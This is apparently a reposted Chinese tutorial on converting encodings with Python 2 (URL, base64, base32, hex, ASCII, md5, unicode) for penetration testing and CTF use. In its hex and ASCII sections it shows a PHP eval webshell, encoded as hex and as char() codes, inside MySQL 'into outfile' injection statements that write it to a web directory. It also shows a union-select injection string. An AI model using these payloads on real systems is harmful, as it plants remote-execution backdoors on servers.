python中關於編碼轉換的實例詳解

Y2J
發布: 2017-05-03 15:52:49
原創
1563 人瀏覽過

在日常滲透,漏洞挖掘,甚至是CTF比賽中會遇到各種編碼,常常伴隨著這些編碼之間的各種轉換。以下這篇文章主要介紹了python中編碼轉換妙用的相關資料,需要的朋友們可以參考借鑒,下面來一起看看吧。

前言

記得剛入門那個時候,自己處理編碼轉換問題往往是「百度:url解碼、base64加密、hex… ”,或者是使用一款叫做“小葵多功能轉換工具”的軟體,再後來直接上Burpsuite的decoder功能,感覺用的還挺好的。不過,也遇到些問題:線上轉換效率低(搜尋佔去了2/3的時間)、兩款工具存在一些小問題,例如burp中涉及中文往往顯示亂碼。



直到使用python來作為我日常編碼轉換工具…

#開啟py轉換之旅

url編碼

#url編碼是一種瀏覽器用來打包表單輸入的格式.可謂是一名作為web人員最熟悉的一種編碼方式了。

>>> from urllib import *
>>> quote("union select null,null,null")
'union%20select%20null%2Cnull%2Cnull'
>>> unquote("union%20select%20null%2Cnull%2Cnull")
'union select null,null,null'
>>> urlencode({'x':'2333','y':'666'})
'y=666&x=2333'
登入後複製

Base64

Base64常用作網頁表單和HTTP傳輸的一些參數,也常用於郵件協定傳輸使用者資訊等。

>>> import base64
>>> base64.b64encode("admin")
'YWRtaW4='
>>> base64.b64decode('YWRtaW4=')
'admin'
登入後複製

記得有次ctf比賽中考到了base32解密,一般網站不提供線上解密,一時之間似乎沒有辦法繼續下去。不過如果你使用python的話會像上邊解密base64一樣簡單,只需要將函數改變下:

>>> import base64
>>> base64.b32encode('jjjjj')
'NJVGU2TK'
>>> base64.b32decode('NJVGU2TK')
'jjjjj'
登入後複製

Hex

十六進位編碼也是web application中常見的一種編碼方案。身為web安全人員,我們心知肚明的是,MySQL注入可以使用hex繞過htmlspecialchars()函數從而寫入webshel​​l。

例如:

select 0x3c3f70687020406576616c28245f504f53545b615d293b203f3e into outfile '/web/1.php'
登入後複製

下面是python實作hex加解密的方法:

>>> &#39;<?php @eval($_POST[a]); ?>&#39;.encode(&#39;hex&#39;)
&#39;3c3f70687020406576616c28245f504f53545b615d293b203f3e&#39;
>>>
>>> print &#39;3c3f70687020406576616c28245f504f53545b615d293b203f3e&#39;.decode(&#39;hex&#39;)
<?php @eval($_POST[a]); ?>
>>>
登入後複製

ASCii

MySQL中的char()函數則是轉換ascii碼的,也因為如此,也可以使用這個特性來繞過htmlspecialchars()函數。

例如:

select char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 97, 93, 41, 59, 32, 63, 62) into outfile &#39;/web/1.php&#39;
登入後複製

使用python將字串轉換ascii很簡單,但是逆轉換的話需要需要點小操作:

>>> map(ord, "<?php phpinfo() ?>")
[60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]

>>> print chr(112)
p

>>> l = [60, 63, 112, 104, 112, 32, 112, 104, 112, 105, 110, 102, 111, 40, 41, 32, 63, 62]
>>> print &#39;&#39;.join(map(chr,l)) #感谢pcat表哥指出的方法
<?php phpinfo() ?>
登入後複製

#Md5

md5在web安全界可以說是人盡皆知了,以他的不可逆性,大多數網站儲存使用者密碼等關鍵資料時常常使用md5加密。有的時候我們提交payload需要md5加密,這個時候用下面的方法就可以輕鬆實現。當然解密的話推薦去cmd5。

>>> from hashlib import md5
>>> m = md5()
>>> m.update(&#39;this is a secret&#39;)
>>> m.hexdigest()
&#39;7dbbcee180ba4d456e4aa1cfbdad9c7b&#39;

>>> m.hexdigest()[8:-8]
&#39;80ba4d456e4aa1cf&#39;
>>>
登入後複製

Unicode轉中文

#unicode轉換中文,很多情況下都能遇到。尤其是在做滲透測試的時候。用burp的話會存在中文亂碼的問題,在python下實作非常簡單。

>>> print u"\u4f60\u9700\u8981\u91cd\u65b0\u767b\u9646"
你需要重新登陆
登入後複製

總結

#

以上是python中關於編碼轉換的實例詳解的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板